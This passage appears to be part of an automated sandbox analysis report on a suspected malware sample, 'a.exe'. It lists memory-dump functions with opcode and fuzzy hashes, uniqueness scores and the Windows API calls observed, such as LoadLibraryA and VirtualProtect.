Opcode ID: d2706e12720f1ba8964b3d168b7f5bb6f9f79eecc589694465f8112e98294c2a
Instruction ID: dd7944d0cf1128a11af873abdc17f4f4a56e703f598202a6a759c0373ce4169e
Opcode Fuzzy Hash: d2706e12720f1ba8964b3d168b7f5bb6f9f79eecc589694465f8112e98294c2a
Instruction Fuzzy Hash: A6A012182450782CF6C0B1304C9033410007741B00FC01C022516655C68D4548001446

Uniqueness

Uniqueness Score: -1.00%

Function 069023A0, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.957547020.0000000006900000.00000040.00000001.sdmp, Offset: 06900000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39a72bdfc55e916938755f4d703b438187b30383b26e3d5a9090cb697295ede9
Instruction ID: 82c55a7aff4d64b3b4554c31206cde518307cf9e02fc5fcf9f21a7a828579b94
Opcode Fuzzy Hash: 39a72bdfc55e916938755f4d703b438187b30383b26e3d5a9090cb697295ede9
Instruction Fuzzy Hash: 3FB01212205D0447C3001A10D86334B119563092C4F8A5090004205120DE34422E05E1

Uniqueness

Uniqueness Score: -1.00%

Function 0690BF50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.957547020.0000000006900000.00000040.00000001.sdmp, Offset: 06900000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a8cc28439977923b6ba56aa83c3d3705f3fa6278e11cf55d83e79e51debe31e
Instruction ID: 7454559664beafa9fcdae64bb3ff11e64445accdd193ee5c8ae94258385c5754
Opcode Fuzzy Hash: 8a8cc28439977923b6ba56aa83c3d3705f3fa6278e11cf55d83e79e51debe31e
Instruction Fuzzy Hash: 55C09B149487D65DE752DF345811A747B612B92300FD405EF9DE6450D3A4480C545397

Uniqueness

Uniqueness Score: -1.00%

Function 06E0FB80, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.957849971.0000000006E00000.00000040.00000001.sdmp, Offset: 06E00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b7daa833fac3c3056d5de1a9da09e8650da3743b89f5c3bc6df932237afecc
Instruction ID: 948f3b885b1af0f994e622ff01d4aef74cb43aab716c0e023b289e1eac7b9f80
Opcode Fuzzy Hash: c9b7daa833fac3c3056d5de1a9da09e8650da3743b89f5c3bc6df932237afecc
Instruction Fuzzy Hash: 87B0128442934154D3A1653098207D20B048FB9210F831892D040C00C2A40C40914088

Uniqueness

Uniqueness Score: -1.00%

Function 054163C1, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.956370127.0000000005410000.00000040.00000001.sdmp, Offset: 05410000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f0bcdd731fe5a2662a72e4f6f66573fc45c8b28a30e32af8bd3100eee03aaa
Instruction ID: 03c9e9ebb5eb1a1b4322387bd6d4c222ab443c1c215926ac5c78096b3a2e1e4b
Opcode Fuzzy Hash: 05f0bcdd731fe5a2662a72e4f6f66573fc45c8b28a30e32af8bd3100eee03aaa
Instruction Fuzzy Hash: AFA00139626C0E92DB443B12B98E3E82E64B798310F829396A485091208F3C441CAB2A

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7200, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.952603231.0000000002BD0000.00000040.00000001.sdmp, Offset: 02BD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44

Uniqueness

Uniqueness Score: -1.00%

Function 06904523, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.957547020.0000000006900000.00000040.00000001.sdmp, Offset: 06900000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dcf40f52f5f1a7cac9a02c154fecc119e964b41648c1428049e95823920a338e
Instruction ID: 78bbab86d6f682380941f5f6c2d15c86ba3da7f987698873e88a2870671459b4
Opcode Fuzzy Hash: dcf40f52f5f1a7cac9a02c154fecc119e964b41648c1428049e95823920a338e
Instruction Fuzzy Hash: 90A0025A681C56AADB801F60FD167085957A744346FDA15E04141841E2CE6C86555184

Uniqueness

Uniqueness Score: -1.00%

Function 02BD1480, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.952603231.0000000002BD0000.00000040.00000001.sdmp, Offset: 02BD0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40

Uniqueness

Uniqueness Score: -1.00%

Function 06E0C823, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.957849971.0000000006E00000.00000040.00000001.sdmp, Offset: 06E00000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f80e20e6d74fca9696487ed2f88352d7b7f0e02dfe3edbc952f80ac5b097b16f
Instruction ID: 460eae41ad42d39715be7246e82ce90db6e1582b2c406b6d0dd8b7de8eb114ce
Opcode Fuzzy Hash: f80e20e6d74fca9696487ed2f88352d7b7f0e02dfe3edbc952f80ac5b097b16f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: a.exe PID: 6772 Parent PID: 5596 a.exeCOMMON

Executed Functions

Function 028DB6A1, Relevance: 6.1, APIs: 4, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 028DB710
GetCurrentThread.KERNEL32 ref: 028DB74D
GetCurrentProcess.KERNEL32 ref: 028DB78A
GetCurrentThreadId.KERNEL32 ref: 028DB7E3

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8fa8fe34223c4f632fe82daf6c6a3edb80da652bad41fad329c51374b06325a9
Instruction ID: 5e6b1319c193a167f2c97631d0c45b2be6fae7437f87662ac6e64d78cdfcb6c1
Opcode Fuzzy Hash: 8fa8fe34223c4f632fe82daf6c6a3edb80da652bad41fad329c51374b06325a9
Instruction Fuzzy Hash: 6E5178B49007598FDB10CFAAD988BEEBBF1FF48308F24859AE419A7350D7745848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 028DB6B0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 028DB710
GetCurrentThread.KERNEL32 ref: 028DB74D
GetCurrentProcess.KERNEL32 ref: 028DB78A
GetCurrentThreadId.KERNEL32 ref: 028DB7E3

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 6b7dedfc57f7a7255e17442fe40f2071f78c96a82e12b2e58cba27b83945d3f6
Instruction ID: ecb0c7fce9189f4ce5e5b052e43878093f080d10edaacca2bece495dc5541cfb
Opcode Fuzzy Hash: 6b7dedfc57f7a7255e17442fe40f2071f78c96a82e12b2e58cba27b83945d3f6
Instruction Fuzzy Hash: 275166B89006598FDB10CFAAC988BAEBBF1FF48318F24855AE419A3350D7745848CB65

Uniqueness

Uniqueness Score: -1.00%

Function 028D96B0, Relevance: 1.7, APIs: 1, Instructions: 194COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028D98F6

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 03921a176234c9856cd6498ac8b4b48b6fe3017cc4edd470757aa07b703f306c
Instruction ID: 0b6fc914869882bd2b815954d50373cc03c3ab458476ee708a677ca61893d971
Opcode Fuzzy Hash: 03921a176234c9856cd6498ac8b4b48b6fe3017cc4edd470757aa07b703f306c
Instruction Fuzzy Hash: C9711478A00B058FD724DF6AD44476ABBF1FF88714F008A29D49AD7A50DB75E80ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 028DFD0D, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DFE2A

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c78b1a5bf0556373d3e936ebffeeace408e1d9432cec6a0cdbf0e7df8ef6be80
Instruction ID: cf02d3f7bbd91f0b232901409432a78ca4efd28b031de6ea4a90996ec5ba8792
Opcode Fuzzy Hash: c78b1a5bf0556373d3e936ebffeeace408e1d9432cec6a0cdbf0e7df8ef6be80
Instruction Fuzzy Hash: D35103B4D003489FDB14CFA9C884ADEBFB1FF48314F24812AE419AB211D774A885CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028DFD18, Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DFE2A

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: db55b7c970ae231b6733bf17022a674df7ddab48334085f86b808f5052ab724a
Instruction ID: 29df0c37326c4b8f130e447d0aaf89116beaa3630ad4ae647bb7afbcce0d06b9
Opcode Fuzzy Hash: db55b7c970ae231b6733bf17022a674df7ddab48334085f86b808f5052ab724a
Instruction Fuzzy Hash: F641C2B5D003189FDB14CFA9C884ADEBFB5FF48314F24862AE919AB210D7749985CF90

Uniqueness

Uniqueness Score: -1.00%

Function 028D5364, Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 028D5421

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a1a35a531d63d2142884e93ed1b810eb13e28d8fde40a7154b700c592f0020df
Instruction ID: f6d22b6084a80e284655357dc6e4af1c6698d68fb80c7ce8df9a12e18d22c0c8
Opcode Fuzzy Hash: a1a35a531d63d2142884e93ed1b810eb13e28d8fde40a7154b700c592f0020df
Instruction Fuzzy Hash: C24103B4C00668CEDB24DFA9C8847DEBBB6BF45308F54805AD409BB251DB75694ACF90

Uniqueness

Uniqueness Score: -1.00%

Function 028D3DE4, Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 028D5421

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 541ed398cd088d4cb14c09a34ed96200fc9d2dbe0543ea37f91f94d0ae06b32f
Instruction ID: 0b0e312e64501d4decb613ec11e19527b42371655e288548e96893c2eb86760c
Opcode Fuzzy Hash: 541ed398cd088d4cb14c09a34ed96200fc9d2dbe0543ea37f91f94d0ae06b32f
Instruction Fuzzy Hash: 4841E2B4C00728CFDB24DFAAC84479EBBB5BF49308F50805AD409BB251DB796949CF91

Uniqueness

Uniqueness Score: -1.00%

Function 028DB8D2, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028DB95F

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 4e71dbdd4cef9af118ed60766e0d006de95f1e34cabc8fcc3751c051b628a683
Instruction ID: c3d537a85363ed3aa12beac9b96d8eecf00a550af026a6c31d8f9e7b23c06d02
Opcode Fuzzy Hash: 4e71dbdd4cef9af118ed60766e0d006de95f1e34cabc8fcc3751c051b628a683
Instruction Fuzzy Hash: 942103B5D00258AFDB10CFA9D984AEEBFF4EF48324F14845AE858A7310D374A945CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 028DB8D8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 028DB95F

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 205a9b932bc47b69fb6b5630057b11a68f2b90cb886e5f4cc1352289419d6dee
Instruction ID: cfca5ee39323f555b7b100e175951de8143bb9f59a2e120394d8cb1ab5fece4e
Opcode Fuzzy Hash: 205a9b932bc47b69fb6b5630057b11a68f2b90cb886e5f4cc1352289419d6dee
Instruction Fuzzy Hash: 6A21E4B5900258AFDB10CFA9D984ADEBBF4EB48324F14841AE958A3310D374A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 028D92C8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028D9971,00000800,00000000,00000000), ref: 028D9B82

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7d26197caede0933118c875674c888c9b591ee8000c2e8a15bbedc74562c735f
Instruction ID: 596172afa000decb681524472f5d57dca712134493061621259e3d74eb522cd4
Opcode Fuzzy Hash: 7d26197caede0933118c875674c888c9b591ee8000c2e8a15bbedc74562c735f
Instruction Fuzzy Hash: B91117B99007189FDB10CF9AC844ADEFBF4EB48724F15841AD419B7200D374A945CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 028D9B10, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,028D9971,00000800,00000000,00000000), ref: 028D9B82

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: fbf458a9ca27ad6d4ca75fe081dbdbe70f22b4dd816959dd56bdf90033371b57
Instruction ID: 55aa4293d349413686b627374bc38b4265a2c5e48c0596b9f2deebc3ccf9c159
Opcode Fuzzy Hash: fbf458a9ca27ad6d4ca75fe081dbdbe70f22b4dd816959dd56bdf90033371b57
Instruction Fuzzy Hash: 681159B9D003588FDB10CF9AC844ADEFBF4EB48324F05842AD459A7300C374A549CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 028D9890, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 028D98F6

Memory Dump Source

Source File: 00000011.00000002.840101985.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 62693e35ab888249344a906a42b71da1b4ce7191c6168b1fd3035f1e36e8f35c
Instruction ID: 35d8e6026639aeb64c522d7a01b80f13e4dbd0e7e3ca88f0c99b24870361f141
Opcode Fuzzy Hash: 62693e35ab888249344a906a42b71da1b4ce7191c6168b1fd3035f1e36e8f35c
Instruction Fuzzy Hash: 12110FB9D006598FDB10DF9AC844ADEFBF4EB88324F14855AD829B7600D378A549CFA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: a.exe PID: 5508 Parent PID: 6772 a.exeCOMMON

Executed Functions

Function 0156579D, Relevance: .9, Instructions: 915COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27f8d670a405d0eca55d1311cd9ba5279cc3ff8e2b834c278326e663310b38ef
Instruction ID: 754c39e45f3742f32afb285a56ca0ca89a5b9db19d78e152350393cb76562fd1
Opcode Fuzzy Hash: 27f8d670a405d0eca55d1311cd9ba5279cc3ff8e2b834c278326e663310b38ef
Instruction Fuzzy Hash: 0A922C74A002158FC765DF68D994A9DB7F6FF88310F1085A9E54A9B365EB30ED81CF80

Uniqueness

Uniqueness Score: -1.00%

Function 01560740, Relevance: .7, Instructions: 673COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af16b9ae3fa989d52b394df5f26297265120ffb29ff3ff724c5232020e75d310
Instruction ID: 9909b503965e72db7704536e491fba4639c741924ba8729532962490070af6b2
Opcode Fuzzy Hash: af16b9ae3fa989d52b394df5f26297265120ffb29ff3ff724c5232020e75d310
Instruction Fuzzy Hash: B3521635A105249FDB15DF68C984E59BBB2FF88314F1581A8E54A9F2B2CB31EC91CF80

Uniqueness

Uniqueness Score: -1.00%

Function 01560730, Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e11a92970656bc81ec1f88f4dabef139d636da4d16d32f8a1d64f4d3b2e5978e
Instruction ID: 4b2d9002a19eace570db85a0220dd0a2f98c74650d89db8f11afa447d5873fb0
Opcode Fuzzy Hash: e11a92970656bc81ec1f88f4dabef139d636da4d16d32f8a1d64f4d3b2e5978e
Instruction Fuzzy Hash: 42B16B71A106299FDB54DF69C984B9DBBF1BF88304F1185A9E449EB3A1DB70AC41CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0568E348, Relevance: 1.6, APIs: 1, Instructions: 96libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?), ref: 0568E437

Memory Dump Source

Source File: 00000014.00000002.882996069.0000000005680000.00000040.00000001.sdmp, Offset: 05680000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 54cca36780e21809cfa0f81242d846ffa3719b9f846f37b3b3a3a06812e508a8
Instruction ID: 5d2f2edff5b4577b647c05ab44fe42c957bdc2039e90524050780d453f763514
Opcode Fuzzy Hash: 54cca36780e21809cfa0f81242d846ffa3719b9f846f37b3b3a3a06812e508a8
Instruction Fuzzy Hash: 6B4168B0D00618DFDB10DFA9C8857AEBBF5FB48714F108229E859A7744D7B59841CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0568FA80, Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0568FAF3

Memory Dump Source

Source File: 00000014.00000002.882996069.0000000005680000.00000040.00000001.sdmp, Offset: 05680000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5b7c3b76b3d254f3e61c9a0e866995e60c4f0409a44ec804f6085fb423511b6e
Instruction ID: 9c682b734a0b79c5ad45415247b68160822dc7676cce7320b1447ebd57de4400
Opcode Fuzzy Hash: 5b7c3b76b3d254f3e61c9a0e866995e60c4f0409a44ec804f6085fb423511b6e
Instruction Fuzzy Hash: F521D6759006599FCB10DF9AC884BDEFBF4FB48324F148429E859A7350D778A544CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 01569050, Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d52843c6de3422d7ef40c0f1c47227606a39481956ee1a6b3dc21f29a3a13df
Instruction ID: 7892d0f8ed9357727cced3f189f093ed73a80019556dcf6bec49e4e7b72c8f83
Opcode Fuzzy Hash: 9d52843c6de3422d7ef40c0f1c47227606a39481956ee1a6b3dc21f29a3a13df
Instruction Fuzzy Hash: 2141A030B042449FCB15DB69C494AAEBBF6BF89218F1445AAE106EF3A1CB75DC05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01560491, Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5af7bdfd0d93be98cb64d0f01b0d759230332b0b7b152eea6bdf543534e19746
Instruction ID: 25db8bb5be929fcfc007e0a8651a00f3a4b94250e2547f4cb892f9456a9af7c7
Opcode Fuzzy Hash: 5af7bdfd0d93be98cb64d0f01b0d759230332b0b7b152eea6bdf543534e19746
Instruction Fuzzy Hash: 2EE08CB2C00208EFCB41DEF486001AE7BE4EB45300B2040BA9846D2210FA710A00AB80

Uniqueness

Uniqueness Score: -1.00%

Function 015671B8, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aa809753f5afc92d60ba378db6ba1e451cdd7d9112a151a853443076b8b114
Instruction ID: 630754bc6cb9db3dd6153a06b7f86c968a7e14c4dcf517fcb53db94654b6d59e
Opcode Fuzzy Hash: f4aa809753f5afc92d60ba378db6ba1e451cdd7d9112a151a853443076b8b114
Instruction Fuzzy Hash: F9E0C2B6C0520DAFC712EFB4C90059E7BB9EF05100F0000EAD405D7292F9324B009BC2

Uniqueness

Uniqueness Score: -1.00%

Function 0156487F, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddad4109a75c3cf48bb5756ec6b65a5283c1941326f7ddf094e6459572401d9b
Instruction ID: ca15cd9686ee19faf4c9bc4db2ee3f1f7664d5cbdf5b6af2a70b5357a16b2aa0
Opcode Fuzzy Hash: ddad4109a75c3cf48bb5756ec6b65a5283c1941326f7ddf094e6459572401d9b
Instruction Fuzzy Hash: D5D05EF3D995A08BE7238C2D5984156B781F7712017AA84B79190CA882F646C14BC394

Uniqueness

Uniqueness Score: -1.00%

Function 015647C0, Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a285532f6efc26b5dfadd23a2c9d3de1ee55402c21fc042cc2d9106dbab6332d
Instruction ID: e7467af8ad95370313dbcaabfdae6e83540f464743d195535da4ef6a55cea841
Opcode Fuzzy Hash: a285532f6efc26b5dfadd23a2c9d3de1ee55402c21fc042cc2d9106dbab6332d
Instruction Fuzzy Hash: F3D05EB56183815FD342DE24C84085BF7A2FBD5300F01CC6FE88187292D722DC07D6A0

Uniqueness

Uniqueness Score: -1.00%

Function 015671C8, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3446d2200452a13f7aeef16b25b429f55f7aa28c7a5431b89fd6a0b545f7d99a
Instruction ID: 24f85ea79f2751cb19f221b4d83c6a0466cb735bb7b652a0773d27c6ab81cd08
Opcode Fuzzy Hash: 3446d2200452a13f7aeef16b25b429f55f7aa28c7a5431b89fd6a0b545f7d99a
Instruction Fuzzy Hash: 1CD0C9B2D0120DAF4B45EFB4DA0049EBBEDEF45100B1041AA9509D7250EA315B105BD2

Uniqueness

Uniqueness Score: -1.00%

Function 015604A0, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab671d6e3b22c0d22f4baa3b124985cc34291ed9172dec01e63d3f27c7269f18
Instruction ID: 6f6af778fa09032bfc4d48dcf81ba870283761d341d4d532b9faaeca2b6bb571
Opcode Fuzzy Hash: ab671d6e3b22c0d22f4baa3b124985cc34291ed9172dec01e63d3f27c7269f18
Instruction Fuzzy Hash: 40D0C972D0110DEF8B55EFE8DA4449EBBFDEF45204B1041AAA909D7250FA715B109B92

Uniqueness

Uniqueness Score: -1.00%

Function 01567291, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5a68df13bf0a42abe2011e111dcad4184e52d49d48788cc6a432cfc2b91ef2
Instruction ID: bbc18383a3ec00571a2cce1e7f4d4f7c3815145aaf6b279d341e08c4783ff7b4
Opcode Fuzzy Hash: 9b5a68df13bf0a42abe2011e111dcad4184e52d49d48788cc6a432cfc2b91ef2
Instruction Fuzzy Hash: 82D0A7B15593404FC3C1CF10C4524457BB0EFA3214B1584EEC440CB157E7398C03CB21

Uniqueness

Uniqueness Score: -1.00%

Function 015647D0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
Instruction ID: 0a79cfcc9f3950630def7aa8d5064f7db411a5ec17eeb1af5eeabda724e68817
Opcode Fuzzy Hash: b42eb4a4237f3f300b34101a9c64c7a2a34653e472d88958374a96a308d26003
Instruction Fuzzy Hash: 8EC012752082209F9244DA08C840C66B3AAFBC8210B14C84EE85083300CBA2EC07CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01567E58, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc16dff1a5c7d0eaed16622ff4314dfe5bc51be07e2aca1c5dc78e43c4fab58a
Instruction ID: 25ab565b939639f1145b63328a04c421554c6833893b09c5de82bf0e226c9746
Opcode Fuzzy Hash: fc16dff1a5c7d0eaed16622ff4314dfe5bc51be07e2aca1c5dc78e43c4fab58a
Instruction Fuzzy Hash: ACC012353012405FC205CA24C841812F7A59BD9208714C45DE889CB361DA32ED03DB10

Uniqueness

Uniqueness Score: -1.00%

Function 01566B62, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b556e08c93c009a32ddfa6c8e444344470db8201fb6002735171de2b0bc55da
Instruction ID: b69d03d7c94e3183ce55a8dc39b0726a09e26d54b104c4b2d9056815bb09d56d
Opcode Fuzzy Hash: 5b556e08c93c009a32ddfa6c8e444344470db8201fb6002735171de2b0bc55da
Instruction Fuzzy Hash: 09B012F1930500EBE742CA24C851B44F7D0FFA4321F8645A8A8A9C5090FF5BED22C680

Uniqueness

Uniqueness Score: -1.00%

Function 01566F71, Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a8798dbfde3c11d7644221f69accfd001d464e4e29f4efced11909953fdade
Instruction ID: 949cee1089319f0959fdb92d0162d42d733341f918c8075ea5a0c675c53d822d
Opcode Fuzzy Hash: 50a8798dbfde3c11d7644221f69accfd001d464e4e29f4efced11909953fdade
Instruction Fuzzy Hash: 4BC08CB0408A018BC380CA18C490915B760EB54305F3484EDA8268B662D72BE803CA84

Uniqueness

Uniqueness Score: -1.00%

Function 01563A5C, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.869655153.0000000001560000.00000040.00000001.sdmp, Offset: 01560000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e2b3c42efdf4b064c867c76414484de4774fbbb219f517053cb0382779dda3
